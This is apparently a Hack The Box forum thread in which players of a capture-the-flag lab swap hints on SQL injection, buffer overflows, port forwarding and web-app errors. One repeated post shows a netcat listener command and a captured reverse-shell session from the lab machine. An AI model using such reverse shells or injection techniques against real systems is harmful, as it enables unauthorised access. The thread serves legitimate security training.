@stoneric said:
So, after getting the command flag the app becomes super unresponsive and I start to get constant 504s. Is that intended? Obviously my shell is a bit shaky, am I missing some sort of checkpoint to make getting back to that point easier/quicker? If my shell breaks, the entire webapp becomes unresponsive. Any points please PM! Thanks
If the web app becomes unresponsive and you loose your shell, cURL the login page - you should find cURL gives you a response, whereas your browser will not. AFAIK, the exploit at this stage (even when successful) has the ability to break the session and anything tied to its cookie. Try removing the cookie from your browser storage or use incognito, login to the panel again (to get a new cookie) and re-try whatever you did. Should allow you to work around the 504's, assuming you're having the issue I had
For assistance:
1) Plz msg me via the main HTB messaging system, not the forums or my wall
2) Give me some insight as to what you've tried already, or ideas you've moved past
3) Don't expect me to give you the answer-- that defeats the object of being here.
If you find my assistance useful, in any case, please consider clicking that awesome respect button on my profile!
ola, just started on this today.
I can't believe that I can't even get connected
I have found 2 ports where I can ****et to and it lets me some info out but thats about it. unsure on what to do there. little push will be appreciated.
ola, just started on this today.
I can't believe that I can't even get connected
I have found 2 ports where I can ****et to and it lets me some info out but thats about it. unsure on what to do there. little push will be appreciated.
Check the levels and start with the first one.
You'll need to do at least 1-5 in order before you can do 6+.
As with most CTFs, the name of the challenge might give you a hint at where to look.
Am I correct that you need to do Overflown before you can do Secret Message?
I'm able to find the points of entry for 6, 8 (kinda), 9, 10, 11 but can't find where to start 7.
I'm pretty sure I know what type of attack I need to do to beat Overflown, but I have no experience with this yet.
If anyone could point me to some good 101?
Since it appears some other levels require a similar attack method, I'm kinda stuck.
Ok, so I'm up to Auth Bypass. SQLI is one of my biggest weaknesses so I excitedly thought this would be an excellent opportunity to learn. I have made some slow progress but am now at a bit of a dead end and need to ask for a (hopefully) small prod.
My status is that i have a vulnerable form (l*******p). Using a 'U**** S****T' query with 3 fields, I have r/w on one field. I can also use that field to call functions (db name, make pw hashes, etc...). The problem I am struggling to overcome, is that the 'cheatsheet' approach of using password() (or md5(), sha1()...) to 'force' a known password hasn't worked (in a large number of permutations). I also have not managed to nest queries or even figure out a way to enumerate the db schema via the single field I can control and view. Can somebody provide a source of knowledge (or just an angle of thought) where I can learn what is it I am missing?
Many thx in advance.
edit: NM, an ippsec video put me onto the right tool...
ola, just started on this today.
I can't believe that I can't even get connected
I have found 2 ports where I can ****et to and it lets me some info out but thats about it. unsure on what to do there. little push will be appreciated.
Check the levels and start with the first one.
You'll need to do at least 1-5 in order before you can do 6+.
As with most CTFs, the name of the challenge might give you a hint at where to look.
thanks @FlatMarsSociet I have made some progress and on to Going Deeper
So I'm working on #8, skipping #6 and #7 for the moment.
For this, I found that the publicly accessible port gives me some information, but I can't seem to find a method to extract the exact info I need.
I thought it might be useful to connect to a different port (*200), but this one is only accessible to localhost. So I need to do some forwarding.
Could someone help me with the command I'm running via what I found in #5?
I'm trying to get it to work using s***t
Pesky 504's are killing me
EDIT: looks like I might have to do Overflow first?
EDIT: finished Overflow, but still having issues
So like many people that have posted here I have used dig in every configuration that I can think of and have still had no luck. If someone could provide a helping hand it would be most appreciated. Please PM me.
ok I think I am nearly there with overflow however I am unable to get my code working.
I am still for the life of me can't get a reverse shell on to jet, tried netcat, socat and whichever.
for overflow, I am running using burp with socat however, failing.
so it took me over 2 days to get my head around buffer overflows and with help from @FlatMarsSociet and @EvilT0r13
I have had good success with other parts however, I am now stuck with following three
Elasticity
Member Manager
Memo - i have a rough idea of what that is
So like many people that have posted here I have used dig in every configuration that I can think of and have still had no luck. If someone could provide a helping hand it would be most appreciated. Please PM me.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
unable to get a reverse shell from web ... any nudges pls ?
Nobody says you're supposed to get a revshell
Huh?
[email protected]:~/hack_the_box/machines$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [10.13.14.11] from (UNKNOWN) [10.13.37.10] 36820
bash: cannot set terminal process group (1304): Inappropriate ioctl for device
bash: no job control in this shell [email protected]:~/REDACTED$
unable to get a reverse shell from web ... any nudges pls ?
Nobody says you're supposed to get a revshell
Huh?
[email protected]:~/hack_the_box/machines$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [10.13.14.11] from (UNKNOWN) [10.13.37.10] 36820
bash: cannot set terminal process group (1304): Inappropriate ioctl for device
bash: no job control in this shell [email protected]:~/REDACTED$
It's not because you can, that you really need to.
Sometimes people get stuck looking for a way to get a revshell, while everything they need is right in from of them
unable to get a reverse shell from web ... any nudges pls ?
Nobody says you're supposed to get a revshell
Huh?
[email protected]:~/hack_the_box/machines$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [10.13.14.11] from (UNKNOWN) [10.13.37.10] 36820
bash: cannot set terminal process group (1304): Inappropriate ioctl for device
bash: no job control in this shell [email protected]:~/REDACTED$
It's not because you can, that you really need to.
Sometimes people get stuck looking for a way to get a revshell, while everything they need is right in from of them
That's fair. In this case, a revshell provided no more towards the objective than was already available. A 'distraction', as you say.
Got some JSON output for elasticity but not sure if the content is supposed to serve as a hint. Stuck on elasticity like most people on the forum apparently...
Comments
If the web app becomes unresponsive and you loose your shell, cURL the login page - you should find cURL gives you a response, whereas your browser will not. AFAIK, the exploit at this stage (even when successful) has the ability to break the session and anything tied to its cookie. Try removing the cookie from your browser storage or use incognito, login to the panel again (to get a new cookie) and re-try whatever you did. Should allow you to work around the 504's, assuming you're having the issue I had
For assistance:
1) Plz msg me via the main HTB messaging system, not the forums or my wall
2) Give me some insight as to what you've tried already, or ideas you've moved past
3) Don't expect me to give you the answer-- that defeats the object of being here.
If you find my assistance useful, in any case, please consider clicking that awesome respect button on my profile!
Stuck on the command flag...i know it has something to do with the email form and the cursewords (at least that is what i think)
3 days and no idea...
Anyone willing to lend a hand?
Can anyone help me in Overflown, I tried from last 4 days and 64bit is new for me, I am familiar with 32bit
edit: nvm got it digging
You can pm me on discord sh4d0wless#6154
Type your comment> @AnonRyuk said:
I found that one, which lead to me where I found Flag 4, however still having issues finding Flag 3. Any nudges, PM maybe?
EDIT: nvm, didn't follow the source
ola, just started on this today.
I can't believe that I can't even get connected
I have found 2 ports where I can ****et to and it lets me some info out but thats about it. unsure on what to do there. little push will be appreciated.
Type your comment> @idevilkz said:
Check the levels and start with the first one.
You'll need to do at least 1-5 in order before you can do 6+.
As with most CTFs, the name of the challenge might give you a hint at where to look.
Am I correct that you need to do Overflown before you can do Secret Message?
I'm able to find the points of entry for 6, 8 (kinda), 9, 10, 11 but can't find where to start 7.
I'm pretty sure I know what type of attack I need to do to beat Overflown, but I have no experience with this yet.
If anyone could point me to some good 101?
Since it appears some other levels require a similar attack method, I'm kinda stuck.
Ok, so I'm up to Auth Bypass.
SQLI is one of my biggest weaknesses so I excitedly thought this would be an excellent opportunity to learn. I have made some slow progress but am now at a bit of a dead end and need to ask for a (hopefully) small prod.
My status is that i have a vulnerable form (l*******p). Using a 'U**** S****T' query with 3 fields, I have r/w on one field. I can also use that field to call functions (db name, make pw hashes, etc...). The problem I am struggling to overcome, is that the 'cheatsheet' approach of using password() (or md5(), sha1()...) to 'force' a known password hasn't worked (in a large number of permutations). I also have not managed to nest queries or even figure out a way to enumerate the db schema via the single field I can control and view. Can somebody provide a source of knowledge (or just an angle of thought) where I can learn what is it I am missing?
Many thx in advance.
edit: NM, an ippsec video put me onto the right tool...
Type your comment> @FlatMarsSociet said:
thanks @FlatMarsSociet I have made some progress and on to Going Deeper
So I'm working on #8, skipping #6 and #7 for the moment.
For this, I found that the publicly accessible port gives me some information, but I can't seem to find a method to extract the exact info I need.
I thought it might be useful to connect to a different port (*200), but this one is only accessible to localhost. So I need to do some forwarding.
Could someone help me with the command I'm running via what I found in #5?
I'm trying to get it to work using s***t
Pesky 504's are killing me
EDIT: looks like I might have to do Overflow first?
EDIT: finished Overflow, but still having issues
So like many people that have posted here I have used dig in every configuration that I can think of and have still had no luck. If someone could provide a helping hand it would be most appreciated. Please PM me.
Hi
I stuck on "more secrets" edit .. is ok
Hi, any help for elasticity ? (The last flag to finish the lab for me)
I think my post 3 posts above yours might give you a hint.
In return, you could perhaps give me a hint on how to get over my issue?
ok I think I am nearly there with overflow however I am unable to get my code working.
I am still for the life of me can't get a reverse shell on to jet, tried netcat, socat and whichever.
for overflow, I am running using burp with socat however, failing.
@FlatMarsSociet I'm on same point
so it took me over 2 days to get my head around buffer overflows and with help from @FlatMarsSociet and @EvilT0r13
I have had good success with other parts however, I am now stuck with following three
Elasticity
Member Manager
Memo - i have a rough idea of what that is
unable to get a reverse shell from web ... any nudges pls ?
which part Command ? PM
@B3ard3d said:
https://forum.hackthebox.eu/discussion/comment/69642/#Comment_69642
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
I got stuck in overflown, I have the file l***. Any nudges please
Type your comment> @nitinrkz said:
Nobody says you're supposed to get a revshell
Type your comment> @FlatMarsSociet said:
Huh?
[email protected]:~/hack_the_box/machines$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [10.13.14.11] from (UNKNOWN) [10.13.37.10] 36820
bash: cannot set terminal process group (1304): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/REDACTED$
Type your comment> @FlatMarsSociet said:
hey I actually managed to get one
had to do some tricks but finally 
Apart from that , Any tutorials i can use for overflows ?
could anyone provide a nudge on the Command? I identified an interesting function in SC but I haven't had any luck exploiting it. Thanks in advance.
Type your comment> @roowashere said:
It's not because you can, that you really need to.
Sometimes people get stuck looking for a way to get a revshell, while everything they need is right in from of them
Type your comment> @FlatMarsSociet said:
That's fair. In this case, a revshell provided no more towards the objective than was already available. A 'distraction', as you say.
Thanks for the timely reminder.
Got some JSON output for elasticity but not sure if the content is supposed to serve as a hint. Stuck on elasticity like most people on the forum apparently...
Can anyone point me in the right direction?
I feel like I'm digging in circles. Anyone able to nudge me in the right direction?
NVM: was being dumb. Now fun with bypass..
Feel free to ask for hints/nudges. Just PM me what you've already done, & give respect if I help you.